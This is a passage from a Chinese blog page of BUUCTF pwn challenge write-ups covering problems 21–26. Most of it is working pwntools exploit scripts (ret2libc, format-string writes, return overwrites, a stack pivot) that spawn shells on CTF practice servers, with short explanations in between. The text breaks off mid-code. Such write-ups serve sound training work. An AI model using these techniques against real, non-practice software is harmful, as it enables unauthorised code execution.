<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"maple-pwn.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.23.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="buuctf刷题记录（21-40题）by Maple 21_铁人三项（第五赛区) _2018_ropret2libc 1234567891011121314151617181920212223242526272829from pwn import *from LibcSearcher import LibcSearcherfrom ctypes import *context(os&#x3D;&#x27;l">
<meta property="og:type" content="article">
<meta property="og:title" content="Maple">
<meta property="og:url" content="http://maple-pwn.github.io/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8821-40%E9%A2%98%EF%BC%89/index.html">
<meta property="og:site_name" content="Maple">
<meta property="og:description" content="buuctf刷题记录（21-40题）by Maple 21_铁人三项（第五赛区) _2018_ropret2libc 1234567891011121314151617181920212223242526272829from pwn import *from LibcSearcher import LibcSearcherfrom ctypes import *context(os&#x3D;&#x27;l">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://maple-pwn.github.io/images/image-20250131225811634.png">
<meta property="og:image" content="http://maple-pwn.github.io/images/image-20250131230108221.png">
<meta property="og:image" content="http://maple-pwn.github.io/images/image-20250131231137749.png">
<meta property="og:image" content="http://maple-pwn.github.io/images/image-20250131233050407.png">
<meta property="og:image" content="http://maple-pwn.github.io/images/image-20250201215315053.png">
<meta property="og:image" content="http://maple-pwn.github.io/images/image-20250201232816600.png">
<meta property="og:image" content="http://maple-pwn.github.io/images/image-20250201233714092.png">
<meta property="og:image" content="http://maple-pwn.github.io/images/image-20250202230419710.png">
<meta property="article:published_time" content="2025-04-03T17:34:36.801Z">
<meta property="article:modified_time" content="2025-03-02T09:41:25.017Z">
<meta property="article:author" content="Maple">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://maple-pwn.github.io/images/image-20250131225811634.png">


<link rel="canonical" href="http://maple-pwn.github.io/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8821-40%E9%A2%98%EF%BC%89/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://maple-pwn.github.io/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8821-40%E9%A2%98%EF%BC%89/","path":"2025/04/04/buuctf/buuctf刷题记录（21-40题）/","title":""}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title> | Maple</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Maple</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Maple’s Blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8821-40%E9%A2%98%EF%BC%89"><span class="nav-number">1.</span> <span class="nav-text">buuctf刷题记录（21-40题）</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#21-%E9%93%81%E4%BA%BA%E4%B8%89%E9%A1%B9%EF%BC%88%E7%AC%AC%E4%BA%94%E8%B5%9B%E5%8C%BA-2018-rop"><span class="nav-number">1.1.</span> <span class="nav-text">21_铁人三项（第五赛区) _2018_rop</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#22-bjdctf-2020-babystack2"><span class="nav-number">1.2.</span> <span class="nav-text">22 bjdctf_2020_babystack2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#23-bjdctf-2020-babyrop"><span class="nav-number">1.3.</span> <span class="nav-text">23 bjdctf_2020_babyrop</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#24-jarviso-fm"><span class="nav-number">1.4.</span> <span class="nav-text">24 jarviso_fm</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#25-jatviso-tell-me-something"><span class="nav-number">1.5.</span> <span class="nav-text">25 jatviso_tell_me_something</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#26-ciscn-2019-es-2"><span class="nav-number">1.6.</span> <span class="nav-text">26 ciscn_2019_es_2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A0%88%E8%BF%81%E7%A7%BB"><span class="nav-number">1.6.1.</span> <span class="nav-text">栈迁移</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#27-HarekazeCTF2019-baby-rop2"><span class="nav-number">1.7.</span> <span class="nav-text">27 HarekazeCTF2019 baby_rop2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#28-picoctf-2018-rop-chain"><span class="nav-number">1.8.</span> <span class="nav-text">28 picoctf_2018_rop chain</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#29-pwn2-sctf-2016"><span class="nav-number">1.9.</span> <span class="nav-text">29 pwn2_sctf_2016</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#30-jarvisoj-level3"><span class="nav-number">1.10.</span> <span class="nav-text">30 jarvisoj_level3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#31-ciscn-2019-s-3"><span class="nav-number">1.11.</span> <span class="nav-text">31 ciscn_2019_s_3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#32-wustctf2020-getshell"><span class="nav-number">1.12.</span> <span class="nav-text">32 wustctf2020_getshell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#33-ez-pz-hackover-2016-%E5%8A%A8%E6%80%81%E8%B0%83%E8%AF%95%E5%85%A5%E9%97%A8"><span class="nav-number">1.13.</span> <span class="nav-text">33 ez_pz_hackover_2016 (动态调试入门)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#34-jarvisoj-level3-x64"><span class="nav-number">1.14.</span> <span class="nav-text">34 jarvisoj_level3_x64</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#35-mrctf2020-shellcode"><span class="nav-number">1.15.</span> <span class="nav-text">35 mrctf2020_shellcode</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#36-bjdctf-2020-babyrop2"><span class="nav-number">1.16.</span> <span class="nav-text">36 bjdctf_2020_babyrop2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#canary%E4%BF%9D%E6%8A%A4"><span class="nav-number">1.16.1.</span> <span class="nav-text">canary保护</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#37-babyheap-0ctf-2017"><span class="nav-number">1.17.</span> <span class="nav-text">37 babyheap_0ctf_2017</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#38-bjdctf-2020-router"><span class="nav-number">1.18.</span> <span class="nav-text">38 bjdctf_2020_router</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E4%B8%80%EF%BC%9B%E5%91%BD%E4%BB%A4%E4%BA%8C%E8%BF%99%E6%A0%B7%E7%9A%84%E6%A0%BC%E5%BC%8F%E4%BC%9A%E6%89%A7%E8%A1%8C%E4%B8%A4%E7%A7%8D%E6%8C%87%E4%BB%A4"><span class="nav-number">1.18.0.1.</span> <span class="nav-text">命令一；命令二这样的格式会执行两种指令</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#39-inndy-rop"><span class="nav-number">1.19.</span> <span class="nav-text">39 inndy_rop</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#40-jarviso-level4"><span class="nav-number">1.20.</span> <span class="nav-text">40 jarviso_level4</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Maple</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">44</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://maple-pwn.github.io/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8821-40%E9%A2%98%EF%BC%89/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Maple">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Maple">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content=" | Maple">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-04-04 01:34:36" itemprop="dateCreated datePublished" datetime="2025-04-04T01:34:36+08:00">2025-04-04</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-03-02 17:41:25" itemprop="dateModified" datetime="2025-03-02T17:41:25+08:00">2025-03-02</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="buuctf刷题记录（21-40题）"><a href="#buuctf刷题记录（21-40题）" class="headerlink" title="buuctf刷题记录（21-40题）"></a>buuctf刷题记录（21-40题）</h1><p>by Maple</p>
<h2 id="21-铁人三项（第五赛区-2018-rop"><a href="#21-铁人三项（第五赛区-2018-rop" class="headerlink" title="21_铁人三项（第五赛区) _2018_rop"></a>21_铁人三项（第五赛区) _2018_rop</h2><p>ret2libc</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">27252</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line">write_got = elf.got[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">write_plt = elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">main = elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x88</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">4</span>+p32(write_plt)+p32(main)+p32(<span class="number">1</span>)+p32(write_got)+p32(<span class="number">4</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">write_addr = u32(p.recv(<span class="number">4</span>))</span><br><span class="line">libc  = LibcSearcher(<span class="string">&#x27;write&#x27;</span>,write_addr)</span><br><span class="line">libc_base = write_addr-libc.dump(<span class="string">&#x27;write&#x27;</span>)</span><br><span class="line">log.info(<span class="string">&quot;libc_base:&quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">sys = libc_base+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">binsh = libc_base+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line">payload2 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x88</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">4</span>+p32(sys)+p32(<span class="number">0</span>)+p32(binsh)</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="22-bjdctf-2020-babystack2"><a href="#22-bjdctf-2020-babystack2" class="headerlink" title="22 bjdctf_2020_babystack2"></a>22 bjdctf_2020_babystack2</h2><p>看源码，发现输入长度是<code>int</code>型，而<code>read</code>读取的长度为<code>unsigned int</code>型，所以输入-1就可以了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">27683</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line">p.sendline(<span class="string">&#x27;-1&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;name?\n&#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x10</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x8</span>+p64(<span class="number">0x400726</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="23-bjdctf-2020-babyrop"><a href="#23-bjdctf-2020-babyrop" class="headerlink" title="23 bjdctf_2020_babyrop"></a>23 bjdctf_2020_babyrop</h2><p>ret2libc</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">26423</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line">puts_plt=elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_got=elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">main=elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">pop_rdi = <span class="number">0x400733</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;story!\n&#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x20</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x8</span>+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">puts_addr = u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">libc = LibcSearcher(<span class="string">&#x27;puts&#x27;</span>,puts_addr)</span><br><span class="line">libc_base = puts_addr-libc.dump(<span class="string">&#x27;puts&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;story!\n&#x27;</span>)</span><br><span class="line">sys = libc_base+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">binsh = libc_base+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line">payload2 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x20</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x8</span>+p64(pop_rdi)+p64(binsh)+p64(sys)+p64(main)</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="24-jarviso-fm"><a href="#24-jarviso-fm" class="headerlink" title="24 jarviso_fm"></a>24 jarviso_fm</h2><p>看名字就知道是格式化字符串，x&#x3D;&#x3D;4的时候就可以getshell</p>
<p>直接找到x的地址，用自带函数就行</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">payload = fmtstr_payload(<span class="number">11</span>,&#123;<span class="number">0x804a02c</span>:<span class="number">0x4</span>&#125;)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="25-jatviso-tell-me-something"><a href="#25-jatviso-tell-me-something" class="headerlink" title="25 jatviso_tell_me_something"></a>25 jatviso_tell_me_something</h2><p>这道题有一点小坑,一般都是将<code>ebp</code>压入栈，然后将<code>esp</code>的值赋值给<code>ebp</code>，然后<code>esp</code>减去对应的栈空间的大小</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">push	ebp</span><br><span class="line">mov		ebp, esp</span><br><span class="line">sub		esp, 18h</span><br></pre></td></tr></table></figure>

<p>但是这道题直接将<code>rsp</code>减去0x88，这里并没有把<code>rbp</code>压入栈，所以只需要0x88大小就可以覆盖返回地址了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">28402</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x88</span>+p64(<span class="number">0x400620</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;:&#x27;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="26-ciscn-2019-es-2"><a href="#26-ciscn-2019-es-2" class="headerlink" title="26 ciscn_2019_es_2"></a>26 ciscn_2019_es_2</h2><p>发现溢出只有八字节，需要栈迁移</p>
<p>我觉得这位师傅讲的不错，<a target="_blank" rel="noopener" href="https://bbs.kanxue.com/thread-269163.htm">ciscn_2019_es_2</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> * </span><br><span class="line">context.terminal = [<span class="string">&#x27;terminator&#x27;</span>,<span class="string">&#x27;-x&#x27;</span>,<span class="string">&#x27;sh&#x27;</span>,<span class="string">&#x27;-c&#x27;</span>]</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">p=remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">25052</span>)</span><br><span class="line"><span class="comment">#p=process(&quot;./pwn&quot;)</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">sys_addr=elf.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">leave_ret=<span class="number">0x080484b8</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;name?\n&quot;</span>)</span><br><span class="line">payload1= <span class="number">0x20</span>*<span class="string">&quot;a&quot;</span>+<span class="string">&quot;b&quot;</span>*<span class="number">0x8</span></span><br><span class="line">p.send(payload1)</span><br><span class="line">p.recvuntil(<span class="string">&quot;b&quot;</span>*<span class="number">0x8</span>)</span><br><span class="line">ebp_addr=u32(p.recv(<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line">log.info(<span class="string">&#x27;ebp:&#x27;</span>+<span class="built_in">hex</span>(ebp_addr))</span><br><span class="line"></span><br><span class="line">payload2 = (<span class="string">b&quot;aaaa&quot;</span>+p32(sys_addr)+<span class="string">b&#x27;aaaa&#x27;</span>+p32(ebp_addr-<span class="number">0x28</span>)+<span class="string">b&#x27;/bin/sh&#x27;</span>).ljust(<span class="number">0x28</span>,<span class="string">b&#x27;\x00&#x27;</span>)+p32(ebp_addr-<span class="number">0x38</span>) + p32(leave_ret)</span><br><span class="line">p.send(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="栈迁移"><a href="#栈迁移" class="headerlink" title="栈迁移"></a>栈迁移</h3><p><code>vul</code>函数看一下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">vul</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> s[<span class="number">40</span>]; <span class="comment">// [esp+0h] [ebp-28h] BYREF</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">memset</span>(s, <span class="number">0</span>, <span class="number">0x20u</span>);</span><br><span class="line">  read(<span class="number">0</span>, s, <span class="number">0x30u</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Hello, %s\n&quot;</span>, s);</span><br><span class="line">  read(<span class="number">0</span>, s, <span class="number">0x30u</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">printf</span>(<span 